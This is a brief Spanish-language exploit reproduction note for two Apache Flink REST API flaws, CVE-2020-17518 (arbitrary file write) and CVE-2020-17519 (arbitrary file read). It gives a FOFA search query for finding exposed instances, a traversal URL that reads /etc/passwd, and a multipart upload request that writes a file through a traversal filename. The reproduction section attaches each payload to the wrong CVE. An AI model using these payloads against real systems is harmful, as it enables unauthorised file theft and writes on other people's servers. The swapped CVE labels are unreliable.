búsqueda de fofa
app = "APACHE-Flink"
Número de vulnerabilidad:
CVE-2020-17518 , CVE-2020-17519
Descripción de la vulnerabilidad:
CVE-2020-17518: escribir archivos remotos a través de la API REST
Versión afectada:
Flink 1.5.1-1.11.2
Flink 1.5.1 presenta la API REST, que puede copiar cualquier archivo en cualquier ubicación del sistema de archivos a través de un ENCABEZADO HTTP modificado de forma malintencionada.
CVE-2020-17519: leer archivos remotos a través de la API REST
Versiones afectadas:
1.11.0, 1.11.1, 1.11.2
Un cambio introducido en Apache Flink 1.11.0-1.11.2 permite a un atacante leer cualquier archivo en el sistema de archivos local a través de la interfaz REST del proceso JobManager, y el acceso está limitado a los archivos accesibles por el proceso JobManager.
Recurrencia de la vulnerabilidad
CVE-2020-17518
http://ip:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
CVE-2020-17519
Construya un paquete de datos para enviar
POST /jars/upload HTTP/1.1
Host: localhost:8081
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoZ8meKnrrso89R6Y
Content-Length: 187
------WebKitFormBoundaryoZ8meKnrrso89R6Y
Content-Disposition: form-data; name="jarfile"; filename="../../../../../../tmp/success"
success
------WebKitFormBoundaryoZ8meKnrrso89R6Y--
Devolver 400, agregar correctamente
http://ip:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fsuccess